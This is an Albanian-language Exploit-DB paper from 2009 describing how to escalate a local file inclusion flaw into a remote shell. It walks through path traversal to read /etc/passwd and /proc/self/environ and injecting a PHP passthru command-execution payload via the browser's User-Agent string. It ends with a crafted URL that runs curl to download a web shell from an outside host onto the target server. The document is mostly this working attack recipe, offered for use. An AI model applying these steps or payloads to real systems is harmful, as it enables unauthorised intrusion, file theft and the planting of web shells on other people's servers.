[Albanian] Shell Over LFI

EDB-ID:

13558

CVE:

N/A

EDB Verified:

Author:

bi0

Type:

papers

Exploit:   /  

Platform:

Multiple

Date:

2009-12-12

Vulnerable App: 
--------------------------------------------------------------
 [x] Paper : [Albanian] Shell Over LFI
 [+] Author : bi0
 [x] Contact : bukibv@hotmail.com
 [x] Date : 12/12/2009
 [x] Site : www.it-security.ws / www.ssteam.ws
 [x] Thanks : packetdeath,redking,sp1r1t & all my Friends ...
--------------------------------------------------------------

                  ______     __     ______
                 /\  == \   /\ \   /\  __ \
                 \ \  __<   \ \ \  \ \ \/\ \
                  \ \_____\  \ \_\  \ \_____\
                   \/_____/   \/_/   \/_____/

                   01000010 01101001 01001111
               [-]----------------------------[-]
                |                              |
                |  1. Nje Site LFI Vuln        |
                |  2. Modifikimi i User Agent  |
                |  3. Enjoy your Shell         |
                |                              |
               [-]----------------------------[-]



 [1]. Na nevojitet nje site LFI vuln psh :

 [x] http://example.com/index.php?file=serach.php

 Zevendesojm "search.php" me "../" dhe nese na jep error si ne vijim osht LFI vuln psh :

 Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/user/public_html/index.php on line 514
 Tash e dimë se "/" gjindet 4 dir me lart pra :

 [x] http://example.com/index.php?file=../../../../etc/passwd

 Tash shikojm se a ka "logs" qe ruhen ne : /proc/self/environ,
 Pra "/etc/passwd" e zevendesojm me "/proc/self/environ"

 [x] http://example.com/index.php?file=../../../../proc/self/environ

 Nese na del diqka si : "DOCUMENT_ROOT=" atëher i kemi gjetur "logs"

 [2].Modifikimi i User Agentiti :

 Shkojm te FireFox Browser URL the shkruajm : "about:config"
 Te "Filter" shkruajm : "general.useragent.extra.firefox" the na paraqitet diqka keshtu :
----------------------------------------------------------------------------
 Preference name                            Status     Type        Value
general.useragent.extra.firefox     default     string       Firefox/3.5.5
----------------------------------------------------------------------------
 Klikojm 2 here mbi "Firefox/3.5.5" dhe aty e shkruan :

 <? passthru($_GET['c']); ?>

 Per modifikm e User Agent mud ta perdorni edhe "User Agent Switcher" FireFox add-on

 [3]. Enjoy your Shell..

 Tash modifikimi perfundoj tash shkojm ketu :

 [x] http://example.com/index.php?file=../../../../proc/self/environ

 Ne Fund ja shtojm : &c=

 [x] http://example.com/index.php?file=../../../../proc/self/environ&c=

  Nese doni te vendosni shell vetem e shkruani :

 [x] http://example.com/index.php?file=../../../../proc/self/environ&c=curl http://shellsite.com/locus7s.txt -o shell.php

 Mund te perdorni edhe downloader tjeter ..
 Tash shellin e kemi :

 [x] http://example.com/shell.php

 Kaloni Mir ..

#EOF
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services